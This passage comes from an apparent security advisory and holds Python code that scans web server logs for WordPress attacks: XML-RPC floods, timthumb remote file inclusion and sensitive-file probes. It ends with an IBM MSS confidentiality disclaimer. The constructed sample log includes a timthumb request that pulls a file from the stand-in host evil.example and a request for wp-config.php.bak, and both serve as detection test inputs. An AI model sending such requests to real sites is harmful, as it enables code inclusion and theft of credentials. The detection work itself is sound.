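    xmlrpc_posts = defaultdict(list)   # source ip -> timestamps in window
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        url = urlsplit(ev["path"])
        base = url.path.rsplit("/", 1)[-1].lower()
        qs = parse_qs(url.query)

        # 1. XML-RPC flood: too many POSTs to xmlrpc.php from one source.
        if ev["method"] == "POST" and base == "xmlrpc.php":
            window = xmlrpc_posts[ev["ip"]]
            window.append(ev["ts"])
            window[:] = [t for t in window if ev["ts"] - t <= PINGBACK_WINDOW]
            if len(window) == PINGBACK_THRESHOLD:   # fire once on crossing
                alerts.append(("xmlrpc-flood", ev["ip"]))

        # 2. timthumb remote file include: src= points at another host.
        if base == "timthumb.php":
            for src in qs.get("src", []):
                if src.lower().startswith(("http://", "https://", "//")):
                    alerts.append(("timthumb-rfi", ev["ip"]))

        # 3. Direct request for a sensitive WordPress file.
        if base in SENSITIVE_FILES:
            alerts.append(("sensitive-file", ev["ip"]))
    return alerts


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Feb/2015:10:00:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '203.0.113.9 - - [10/Feb/2015:10:00:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '198.51.100.7 - - [10/Feb/2015:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "x"',
    '203.0.113.9 - - [10/Feb/2015:10:00:20 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '198.51.100.7 - - [10/Feb/2015:10:00:25 +0000] "GET /wp-content/themes/t/timthumb.php?src=http://evil.example/x.txt HTTP/1.1" 200 44 "-" "x"',
    '203.0.113.9 - - [10/Feb/2015:10:00:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '198.51.100.7 - - [10/Feb/2015:10:00:31 +0000] "GET /wp-content/themes/t/timthumb.php?src=local.jpg HTTP/1.1" 200 44 "-" "x"',
    '203.0.113.9 - - [10/Feb/2015:10:00:40 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '203.0.113.9 - - [10/Feb/2015:10:00:50 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "x"',
    '198.51.100.7 - - [10/Feb/2015:10:01:02 +0000] "GET /wp-config.php.bak HTTP/1.1" 200 2048 "-" "x"',
]


def run_sample():
    """Convenience wrapper: alerts produced by the constructed sample log."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for kind, ip in run_sample():
        print(f"{kind:15s} {ip}")
```

The flood check fires exactly once when the fifth POST lands inside the window, so a sustained flood does not page the on-call engineer every second; the sensitive-file check fires regardless of status code because a 404 for wp-config.php.bak is still reconnaissance worth seeing.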

DISCLAIMER

This document is intended to inform clients of IBM Security Services of a threat or discovery by IBM Managed

Security Services and measures undertaken or suggested by IBM Security Service Teams to remediate the threat.

The data contained herein describing tactics, techniques and procedures is classified Confidential for the

consumption of IBM MSS clients only.